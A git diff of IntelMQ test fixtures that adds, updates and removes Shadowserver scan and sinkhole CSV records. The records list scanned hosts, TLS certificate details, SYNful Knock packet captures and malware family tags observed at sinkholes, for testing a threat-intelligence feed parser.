+2018-04-19 13:32:50,198.51.100.236,443,,ssl-poodle,TLSv1.0,8447,AT,NIEDEROSTERREICH,,TLS_RSA_WITH_AES_128_CBC_SHA,Y,1024,example,some_issuer,2013-01-30 12:00:08,2023-01-28 12:00:08,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,-462A1420,2,sha1WithRSAEncryption,rsaEncryption,some_org_name,some_org_name,US,,,,,,,,,,Netgear Inc.,Netgear Prosafe,US,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.0,200,OK,text/html,close,,,Embedded HTTP Server.,107,,"Sat, 01 Jan 2011 00:00:21 GMT",N,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-19 13:32:50,198.51.100.224,443,198-51-100-224.example.net,ssl-poodle,TLSv1.0,6830,AT,WIEN,VIENNA,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,Y,2048,198-51-100-224.example.net,some_issuer,2017-08-03 10:21:50,2019-08-03 10:21:50,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,6126D181000300000041,2,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,401,Unauthorized,text/html,,NTLM,,Microsoft-IIS/7.5,1344,,"Thu, 19 Apr 2018 13:32:52 GMT",N,N,N,N,unknown,x509: certificate signed by unknown authority,,,,,,,,,,,
+"2022-02-07 00:01:41","206.162.0.0",10443,,"ssl,ssl-poodle,vpn","TLSv1.2",12345,"CA","BRITISH COLUMBIA","BURNABY","TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","Y",1024,"FWF60D4615000455","support","2015-01-28 18:14:33","2038-01-19 03:14:07","C9:B0:4E:B7:79:94:B4:DD:A7:15:21:86:43:F9:6E:4B:C9:A2:87:D9","1CA40F",2,"sha1WithRSAEncryption","rsaEncryption","Fortinet","FortiGate","US","California","Sunnyvale",,,,,"support@fortinet.com",,,"Fortinet","Certificate Authority","US","California","Sunnyvale",,,,,"support@fortinet.com",,,517311,,"Communications, Service Provider, and Hosting Service","38:F7:E0:92:24:8C:CB:28:43:93:0B:91:17:30:B1:41:8F:4E:2D:E5:A8:93:AE:4D:FE:53:00:D3:0E:53:02:16","0C:F0:37:3F:A8:93:AE:4D:FE:53:00:D3:2A:E6:6D:0B:02:9D:B9:46:58:A6:9E:5A:35:40:FB:62:9C:81:47:0A:4F:15:5D:53:D9:2F:36:4A:0B:3B:10:61:A9:07:EE:94:EC:00:B8:9C:F7:E0:92:24:8C:CB:28:2C:DD:E7:07:C6","8A:B3:08:20:34:79:94:B4:DD:A7:36:D7:14:6E:33:50","HTTP/1.1",200,"OK","text/html",,,,,131,,"Mon, 07 Feb 2022 00:01:43 GMT","Y","N","N","N","unknown","x509: unknown error",,,,,,"Fortinet","firewall","FortiGate",,"enterprise",
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_synfulknock.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_synfulknock.csv
new file mode 100644
index 000000000..8f6355491
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_synfulknock.csv
@@ -0,0 +1,4 @@
+"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","sequence_number","ack_number","window_size","urgent_pointer","tcp_flags","raw_packet","sector"
+"2022-01-10 09:18:23","66.9.0.0","tcp",80,,"synfulknock",18885,"US","NEW JERSEY","JERSEY CITY",,,0,791102,8192,0,4608,"3cfdfec601e4700f6a9a2000080045000034c3780000f706789442099555b869f7ee0050b20800000000000c123e8012200002aa0000020405b40101040201030305",
+"2022-01-10 09:19:17","213.131.0.0","tcp",80,"host-213-131-55-210-customer.wanex.net","synfulknock",35805,"GE","TBILISI","TBILISI",,,0,791102,8192,0,4608,"90e2baaf0b84700f6a9a200008004500003434100000f2064382d58337d2b8698b720050916200000000000c123e8012200059d50000020405b40101040201030305",
+"2022-01-10 09:27:39","213.178.0.0","tcp",80,,"synfulknock",29256,"SY","DIMASHQ","DAMASCUS",,,0,791102,8192,0,4608,"90e2bab9cfd4700f6a9a20000800450000340f1d0000ea068bdad5b2e6914a522f360050eb5200000000000c123e801220001b4a0000020405b40101040201030305"
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_synfulknock.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_synfulknock.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_synfulknock.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_vnc.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_vnc.csv
index 9ba841576..000f5ed42 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_vnc.csv
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_vnc.csv
@@ -1,3 +1,3 @@
-"timestamp","ip","port","hostname","asn","geo","region","city","naics","sic","product","banner"
-"2019-09-04 14:51:44","198.123.245.53",5678,,5678,"AA","LOCATION","LOCATION",0,0,"Apple remote desktop vnc","RFB 003.889"
-"2019-09-04 14:51:44","198.123.245.112",5678,"localhost.localdomain",5678,"AA","LOCATION","LOCATION",517311,0,"RealVNC Enterprise v5.3 or later","RFB 005.000"
+"timestamp","ip","port","hostname","asn","geo","region","city","naics","sic","product","banner","sector"
+"2019-09-04 14:51:44","198.123.245.53",5678,,5678,"AA","LOCATION","LOCATION",0,0,"Apple remote desktop vnc","RFB 003.889",
+"2019-09-04 14:51:44","198.123.245.112",5678,"localhost.localdomain",5678,"AA","LOCATION","LOCATION",517311,0,"RealVNC Enterprise v5.3 or later","RFB 005.000",
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/sinkhole6_http.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/sinkhole6_http.csv
deleted file mode 100644
index bf76c68c6..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/sinkhole6_http.csv
+++ /dev/null
@@ -1,4 +0,0 @@
-"timestamp","src_ip","src_asn","src_geo","src_region","src_port","dst_ip","dst_asn","dst_geo","dst_region","dst_port","protocol","tag","hostname","sysdesc","sysname","http_url","http_agent","http_host","http_referer","http_referer_ip","http_referer_asn","http_referer_geo","http_referer_region","forwarded_by","ssl_cipher"
-"2018-04-08 09:17:36","2001:0db8:abcd:0012:0000:0000:0000:0000",64511,"AT",,36738,"2a02:1668:1034::2",64511,"NL",,80,,"ghost-push",,,,"POST /okla/api/1 HTTP/1.1",,"198-51-100-38.example.net",,,,,,,
-"2018-04-08 15:03:03","2001:0db8:abcd:0012:0000:0000:0000:0000",64511,"AT",,33306,"2a02:1668:1034::2",64511,"NL",,80,,,,,,"GET / HTTP/1.1","Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1","198-51-100-38.example.net",,,,,,,
-"2018-04-08 19:57:45","2001:0db8:abcd:0012:0000:0000:0000:0000",64511,"AT",,52394,"2a02:1668:1034::2",64511,"NL",,80,,"xcodeghost",,,,"POST / HTTP/1.1","Mercury/907 CFNetwork/758.5.3 Darwin/15.6.0","198-51-100-38.example.net",,,,,,,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/sinkhole6_http.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/sinkhole6_http.csv.license
deleted file mode 100644
index f8f131c2c..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/sinkhole6_http.csv.license
+++ /dev/null
@@ -1,2 +0,0 @@
-SPDX-FileCopyrightText: 2019 Sebastian Wagner
-SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/sinkhole_dns.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/sinkhole_dns.csv
deleted file mode 100644
index 007c7887d..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/sinkhole_dns.csv
+++ /dev/null
@@ -1,3 +0,0 @@
-"timestamp","ip","port","host","asn","geo","type","count","query","response","tag","naics","region","sector"
-"2020-12-21 00:00:00","198.51.100.1",40159,,25192,"CZ","A",1,"4.wiNsrw.Com",,"boaxxe",0,"PRAHA",
-"2020-12-21 00:00:06","198.51.100.81",62937,,38044,"MY","A",1,"198-51-100-81.example.net",,"tsifiri",0,"SABAH","Communications"
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/sinkhole_dns.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/sinkhole_dns.csv.license
deleted file mode 100644
index 8b9580cf1..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/sinkhole_dns.csv.license
+++ /dev/null
@@ -1,2 +0,0 @@
-SPDX-FileCopyrightText: 2021 Sebastian Wagner
-SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/sinkhole_http_drone.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/sinkhole_http_drone.csv
deleted file mode 100644
index 61efa7667..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/sinkhole_http_drone.csv
+++ /dev/null
@@ -1,87 +0,0 @@
-"timestamp","ip","asn","geo","url","type","http_agent","tor","src_port","p0f_genre","p0f_detail","hostname","dst_port","http_host","http_referer","http_referer_ip","http_referer_asn","http_referer_geo","dst_ip","dst_asn","dst_geo","naics","sic","http_referer_naics","http_referer_sic","sector","ssl_cipher","application","version"
-"2018-03-21 00:00:07","198.51.100.6",6830,"AT","GET /search?q=0 HTTP/1.0","downadup","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",,49121,,,"198-51-100-6.example.net",80,"198.51.100.68",,,,,"198.51.100.182",393667,"US",518210,737415,,,,,,
-"2018-03-21 00:00:12","198.51.100.74",8447,"AT",,"avalanche-goznym",,,28113,,,,80,"198-51-100-74.example.net",,,,,"198.51.100.35",6939,"US",0,0,,,,,,
-"2018-03-21 00:00:15","198.51.100.124",31510,"AT",,"avalanche-goznym",,,53245,,,,80,"198-51-100-124.example.net",,,,,"198.51.100.248",6939,"US",0,0,,,,,,
-"2018-03-21 00:00:15","198.51.100.8",8447,"AT",,"avalanche-goznym",,,62305,,,,80,"198-51-100-8.example.net",,,,,"198.51.100.224",6939,"US",518210,737415,,,,,,
-"2018-03-21 00:00:21","198.51.100.20",12453,"AT",,"avalanche-andromeda",,,3563,,,,80,"198-51-100-20.example.net",,,,,"198.51.100.47",6939,"US",0,0,,,,,,
-"2018-03-21 00:00:32","198.51.100.176",8437,"AT","GET /search?q=252 HTTP/1.0","downadup","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",,36849,,,,80,"198.51.100.96",,,,,"198.51.100.38",393667,"US",0,0,,,,,,
-"2018-03-21 00:00:38","198.51.100.220",8447,"AT",,"avalanche-nymaim",,,65020,,,,80,"198-51-100-220.example.net",,,,,"198.51.100.194",6939,"US",0,0,,,,,,
-"2018-03-21 00:00:42","198.51.100.72",28760,"AT",,"avalanche-andromeda",,,58555,,,,80,"198-51-100-72.example.net",,,,,"198.51.100.56",6939,"US",0,0,,,,,,
-"2018-03-21 00:00:45","198.51.100.20",8559,"AT",,"avalanche-nymaim",,,61970,,,,80,"198-51-100-20.example.net",,,,,"198.51.100.134",6939,"US",0,0,,,,,,
-"2018-03-21 00:00:56","198.51.100.119",12605,"AT",,"avalanche-andromeda",,,57003,,,,80,"198-51-100-119.example.net",,,,,"198.51.100.61",6939,"US",0,0,,,,,,
-"2018-03-21 00:01:06","198.51.100.143",8447,"AT",,"avalanche-nymaim",,,21183,,,,80,"198-51-100-143.example.net",,,,,"198.51.100.248",6939,"US",0,0,,,,,,
-"2018-03-21 00:01:15","198.51.100.25",6830,"AT",,"avalanche-xswkit",,,48272,,,,80,"198-51-100-25.example.net",,,,,"198.51.100.36",6939,"US",518210,737415,,,,,,
-"2018-03-21 00:01:17","198.51.100.186",35370,"AT","GET /search?q=1 HTTP/1.0","downadup","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)",,3047,,,,80,"198.51.100.24",,,,,"198.51.100.122",393667,"US",0,0,,,,,,
-"2018-03-21 00:01:41","198.51.100.46",1901,"AT",,"avalanche-nymaim",,,2476,,,,80,"198-51-100-46.example.net",,,,,"198.51.100.135",6939,"US",518210,737415,,,,,,
-"2018-03-21 00:01:54","198.51.100.16",49864,"AT","GET /search?q=489 HTTP/1.0","downadup","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)",,3570,,,"198-51-100-16.example.net",80,"198.51.100.8",,,,,"198.51.100.40",393667,"US",0,0,,,,,,
-"2018-03-21 00:02:03","198.51.100.251",57169,"AT",,"avalanche-ranbyus",,,44952,,,,80,"198-51-100-251.example.net",,,,,"198.51.100.130",6939,"US",0,0,,,"Information Technology",,,
-"2018-03-21 00:02:42","198.51.100.150",8447,"AT","GET /t_100_v400/?rnd=24770312&id=372673439262 HTTP/1.1","sality","KUKU v4.00 alpha",,1447,"Windows","XP",,80,"198-51-100-150.example.net",,,,,"198.51.100.77",28753,"DE",0,0,,,,,,
-"2018-03-21 00:02:42","198.51.100.136",8447,"AT","GET /search?q=0 HTTP/1.0","downadup","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",,4997,,,"198-51-100-136.example.net",80,"198.51.100.180",,,,,"198.51.100.132",393667,"US",518210,737415,,,,,,
-"2018-03-21 00:02:56","198.51.100.164",8447,"AT","GET /search?q=0 HTTP/1.0","downadup","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.3; .NET CLR 2.0.50727)",,1906,,,,80,"198.51.100.11",,,,,"198.51.100.39",393667,"US",0,0,,,,,,
-"2018-03-21 00:04:15","198.51.100.240",8447,"AT",,"avalanche-nymaim",,,52255,,,,80,"198-51-100-240.example.net",,,,,"198.51.100.153",6939,"US",518210,737415,,,,,,
-"2018-03-21 00:04:27","198.51.100.116",8447,"AT","GET /search?q=0 HTTP/1.1","downadup","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)",,2944,,,,80,"198.51.100.104",,,,,"198.51.100.116",393667,"US",0,0,,,,,,
-"2018-03-21 00:04:29","198.51.100.72",57169,"AT",,"avalanche-matsnu",,,45158,,,,80,"198-51-100-72.example.net",,,,,"198.51.100.48",6939,"US",0,0,,,"Information Technology",,,
-"2018-03-21 00:04:54","198.51.100.190",1901,"AT",,"avalanche-nymaim",,,2530,,,,80,"198-51-100-190.example.net",,,,,"198.51.100.84",6939,"US",518210,737415,,,,,,
-"2018-03-21 00:04:54","198.51.100.178",8447,"AT",,"avalanche-nymaim",,,53584,,,,80,"198-51-100-178.example.net",,,,,"198.51.100.36",6939,"US",0,0,,,,,,
-"2018-03-21 00:05:28","198.51.100.19",8447,"AT",,"avalanche-nymaim",,,57942,,,,80,"198-51-100-19.example.net",,,,,"198.51.100.0",6939,"US",0,0,,,,,,
-"2018-03-21 00:05:31","198.51.100.135",1901,"AT",,"avalanche-goznym",,,63102,,,,80,"198-51-100-135.example.net",,,,,"198.51.100.160",6939,"US",518210,737415,,,,,,
-"2018-03-21 00:05:34","198.51.100.93",8447,"AT",,"avalanche-nymaim",,,51596,,,,80,"198-51-100-93.example.net",,,,,"198.51.100.21",6939,"US",0,0,,,,,,
-"2018-03-21 00:05:35","198.51.100.30",8447,"AT",,"avalanche-kins",,,1092,,,,80,"198-51-100-30.example.net",,,,,"198.51.100.50",6939,"US",0,0,,,,,,
-"2018-03-21 00:05:36","198.51.100.57",9009,"AT",,"avalanche-generic",,,52212,,,,80,"198-51-100-57.example.net",,,,,"198.51.100.125",6939,"US",0,0,,,,,,
-"2018-03-21 00:05:47","198.51.100.54",34502,"AT",,"avalanche-goznym",,,60159,,,,80,"198-51-100-54.example.net",,,,,"198.51.100.128",6939,"US",0,0,,,,,,
-"2018-03-21 00:05:58","198.51.100.163",49808,"AT","GET /?3c40c91=442259447 HTTP/1.1","sality","KUKU v5.06exp =132589061752",,2916,"Windows","XP",,80,"198-51-100-163.example.net",,,,,"198.51.100.34",60781,"NL",0,0,,,,,,
-"2018-03-21 00:06:07","198.51.100.28",8447,"AT","GET /search?q=0 HTTP/1.1","downadup","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)",,4878,,,,80,"198.51.100.36",,,,,"198.51.100.7",393667,"US",0,0,,,,,,
-"2018-03-21 00:06:35","198.51.100.27",28919,"AT",,"avalanche-generic",,,50203,,,,80,"198-51-100-27.example.net",,,,,"198.51.100.74",6939,"US",0,0,,,,,,
-"2018-03-21 00:06:41","198.51.100.251",8447,"AT",,"avalanche-goznym",,,58714,,,,80,"198-51-100-251.example.net",,,,,"198.51.100.93",6939,"US",0,0,,,,,,
-"2018-03-21 00:06:56","198.51.100.131",6830,"AT","GET /?3c5dbc=35605404 HTTP/1.1","sality","KUKU v5.06exp =106998462068",,1060,"Windows","XP",,80,"198-51-100-131.example.net",,,,,"198.51.100.98",60781,"NL",0,0,,,,,,
-"2018-03-21 00:07:28","198.51.100.39",25255,"AT",,"avalanche-xswkit",,,2088,,,,80,"198-51-100-39.example.net",,,,,"198.51.100.112",6939,"US",0,0,,,,,,
-"2018-03-21 00:07:32","198.51.100.168",12793,"AT","GET /search?q=0 HTTP/1.1","downadup","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)",,54523,,,"198-51-100-168.example.net",80,"198.51.100.189",,,,,"198.51.100.70",393667,"US",0,0,,,,,,
-"2018-03-21 00:07:53","198.51.100.189",9009,"AT","GET /?4744f=875757 HTTP/1.1","sality","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",,24454,"FreeBSD","9.x or newer",,80,"198-51-100-189.example.net",,,,,"198.51.100.251",28753,"DE",0,0,,,,,,
-"2018-03-21 00:08:50","198.51.100.140",8447,"AT","GET /search?q=0 HTTP/1.0","downadup","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",,1108,,,,80,"198.51.100.135",,,,,"198.51.100.160",393667,"US",0,0,,,,,,
-"2018-03-21 00:08:54","198.51.100.197",8447,"AT",,"avalanche-generic",,,53661,,,,80,"198-51-100-197.example.net",,,,,"198.51.100.129",6939,"US",0,0,,,,,,
-"2018-03-21 00:08:55","198.51.100.154",6830,"AT",,"avalanche-nymaim",,,61685,,,,80,"198-51-100-154.example.net",,,,,"198.51.100.22",6939,"US",518210,737415,,,,,,
-"2018-03-21 00:09:17","198.51.100.69",8447,"AT",,"avalanche-goznym",,,54179,,,,80,"198-51-100-69.example.net",,,,,"198.51.100.205",6939,"US",518210,737415,,,,,,
-"2018-03-21 00:09:29","198.51.100.222",12793,"AT",,"avalanche-nymaim",,,41391,,,,80,"198-51-100-222.example.net",,,,,"198.51.100.231",6939,"US",0,0,,,,,,
-"2018-03-21 00:09:31","198.51.100.17",8447,"AT",,"avalanche-matsnu",,,28831,,,,80,"198-51-100-17.example.net",,,,,"198.51.100.14",6939,"US",0,0,,,,,,
-"2018-03-21 00:10:59","198.51.100.144",8447,"AT",,"avalanche-nymaim",,,51804,,,,80,"198-51-100-144.example.net",,,,,"198.51.100.40",6939,"US",0,0,,,,,,
-"2018-03-21 00:11:28","198.51.100.117",6830,"AT",,"avalanche-goznym",,,56011,,,,80,"198-51-100-117.example.net",,,,,"198.51.100.0",6939,"US",0,0,,,,,,
-"2018-03-21 00:11:37","198.51.100.180",201686,"AT",,"avalanche-generic",,,34341,,,,80,"198-51-100-180.example.net",,,,,"198.51.100.58",6939,"US",0,0,,,,,,
-"2018-03-21 00:11:55","198.51.100.223",1901,"AT","GET /search?q=2413 HTTP/1.0","downadup","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",,57369,,,"198-51-100-223.example.net",80,"198.51.100.234",,,,,"198.51.100.19",393667,"US",518210,737415,,,,,,
-"2018-03-21 00:12:01","198.51.100.6",8447,"AT","GET /search?q=0 HTTP/1.0","downadup","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)",,2626,,,"198-51-100-6.example.net",80,"198.51.100.159",,,,,"198.51.100.22",393667,"US",518210,737415,,,,,,
-"2018-03-21 00:12:56","198.51.100.127",57169,"AT",,"avalanche-ranbyus",,,45672,,,,80,"198-51-100-127.example.net",,,,,"198.51.100.244",6939,"US",0,0,,,"Information Technology",,,
-"2018-03-21 00:13:02","198.51.100.62",8412,"AT",,"avalanche-nymaim",,,64305,,,,80,"198-51-100-62.example.net",,,,,"198.51.100.111",6939,"US",0,0,,,,,,
-"2018-03-21 00:13:11","198.51.100.48",8412,"AT",,"avalanche-xswkit",,,15494,,,,80,"198-51-100-48.example.net",,,,,"198.51.100.133",6939,"US",0,0,,,,,,
-"2018-03-21 00:15:39","198.51.100.57",34694,"AT","GET /search?q=0 HTTP/1.1","downadup","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.1.4322)",,3504,,,"198-51-100-57.example.net",80,"198.51.100.94",,,,,"198.51.100.114",393667,"US",0,0,,,,,,
-"2018-03-21 00:17:01","198.51.100.115",1853,"AT","GET /search?q=0 HTTP/1.0","downadup","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)",,20411,,,,80,"198.51.100.251",,,,,"198.51.100.157",393667,"US",0,0,,,,,,
-"2018-03-21 00:19:31","198.51.100.251",6830,"AT",,"avalanche-tinba",,,10700,,,,80,"198-51-100-251.example.net",,,,,"198.51.100.19",6939,"US",518210,737415,,,,,,
-"2018-03-21 00:19:36","198.51.100.49",12793,"AT","GET /search?q=2 HTTP/1.0","downadup","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",,61292,,,"198-51-100-49.example.net",80,"198.51.100.100",,,,,"198.51.100.157",393667,"US",0,0,,,,,,
-"2018-03-21 00:20:24","198.51.100.28",6830,"AT",,"avalanche-nymaim",,,51117,,,,80,"198-51-100-28.example.net",,,,,"198.51.100.82",6939,"US",0,0,,,,,,
-"2018-03-21 00:22:04","198.51.100.211",25255,"AT","GET /search?q=1815 HTTP/1.1","downadup","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)",,4080,,,"198-51-100-120.example.net",80,"198.51.100.154",,,,,"198.51.100.183",393667,"US",0,0,,,,,,
-"2018-03-21 00:22:22","198.51.100.219",199217,"AT","GET /?1e4f4=1117332 HTTP/1.1","sality","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",,34182,"Windows","XP",,80,"198-51-100-219.example.net",,,,,"198.51.100.226",28753,"DE",0,0,,,,,,
-"2018-03-21 00:23:56","198.51.100.0",29287,"AT",,"avalanche-xswkit",,,49361,,,,80,"198-51-100-0.example.net",,,,,"198.51.100.74",6939,"US",0,0,,,,,,
-"2018-03-21 00:24:08","198.51.100.71",61109,"AT","GET /search?q=14 HTTP/1.1","downadup","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)",,7297,,,"198-51-100-71.example.net",80,"198.51.100.165",,,,,"198.51.100.43",393667,"US",0,0,,,,,,
-"2018-03-21 00:26:54","198.51.100.142",35370,"AT","GET /search?q=0 HTTP/1.1","downadup","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB7.5; InfoPath.1; .NET CLR 1.1.4322)",,65134,,,,80,"198.51.100.182",,,,,"198.51.100.40",393667,"US",0,0,,,,,,
-"2018-03-21 00:27:10","198.51.100.209",12793,"AT",,"avalanche-kins",,,55590,,,,443,"198-51-100-209.example.net",,,,,"198.51.100.144",6939,"US",0,0,,,,,,
-"2018-03-21 00:28:17","198.51.100.214",6830,"AT","GET /search?q=1 HTTP/1.0","downadup","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)",,50290,,,"198-51-100-214.example.net",80,"198.51.100.150",,,,,"198.51.100.148",393667,"US",518210,737415,,,,,,
-"2018-03-21 00:30:32","198.51.100.35",1257,"AT",,"avalanche-xswkit",,,49158,,,,80,"198-51-100-35.example.net",,,,,"198.51.100.170",6939,"US",518111,737401,,,,,,
-"2018-03-21 00:31:47","198.51.100.77",1901,"AT",,"avalanche-nymaim",,,60901,,,,80,"198-51-100-77.example.net",,,,,"198.51.100.20",6939,"US",518210,737415,,,,,,
-"2018-03-21 00:33:25","198.51.100.149",25447,"AT","GET /search?q=0 HTTP/1.1","downadup","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",,3056,,,"198-51-100-50.example.net",80,"198.51.100.73",,,,,"198.51.100.143",393667,"US",0,0,,,,,,
-"2018-03-21 00:33:30","198.51.100.94",8447,"AT","GET /search?q=0 HTTP/1.0","downadup","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",,1819,,,"198-51-100-94.example.net",80,"198.51.100.63",,,,,"198.51.100.40",393667,"US",518210,737415,,,,,,
-"2018-03-21 00:33:39","198.51.100.57",8447,"AT","GET /search?q=0 HTTP/1.1","downadup","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",,4703,,,,80,"198.51.100.71",,,,,"198.51.100.215",393667,"US",0,0,,,,,,
-"2018-03-21 00:33:43","198.51.100.2",8447,"AT",,"avalanche-nymaim",,,28409,,,,80,"198-51-100-2.example.net",,,,,"198.51.100.120",6939,"US",0,0,,,,,,
-"2018-03-21 00:34:00","198.51.100.120",9009,"AT",,"avalanche-nymaim",,,40914,,,,80,"198-51-100-120.example.net",,,,,"198.51.100.47",6939,"US",0,0,,,,,,
-"2018-03-21 00:35:21","198.51.100.106",8447,"AT","GET /search?q=11 HTTP/1.0","downadup","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)",,61446,,,,80,"198.51.100.75",,,,,"198.51.100.56",393667,"US",0,0,,,,,,
-"2018-03-21 00:35:31","198.51.100.75",8447,"AT","GET /search?q=0 HTTP/1.1","downadup","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)",,64629,,,,80,"198.51.100.82",,,,,"198.51.100.242",393667,"US",0,0,,,,,,
-"2018-03-21 00:36:44","198.51.100.11",6830,"AT",,"avalanche-nymaim",,,48321,,,,80,"198-51-100-11.example.net",,,,,"198.51.100.138",6939,"US",518210,737415,,,,,,
-"2018-03-21 00:37:33","198.51.100.129",31543,"AT","GET /search?q=5 HTTP/1.0","downadup","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",,2459,,,"198-51-100-129.example.net",80,"198.51.100.191",,,,,"198.51.100.49",393667,"US",0,0,,,,,,
-"2018-03-21 00:38:49","198.51.100.97",8447,"AT","GET /search?q=635 HTTP/1.0","downadup","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",,1177,,,,80,"198.51.100.231",,,,,"198.51.100.35",393667,"US",0,0,,,,,,
-"2018-03-21 00:39:04","198.51.100.129",8447,"AT","GET /search?q=0 HTTP/1.0","downadup","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",,3436,,,"198-51-100-129.example.net",80,"198.51.100.244",,,,,"198.51.100.106",393667,"US",518210,737415,,,"Information Technology",,,
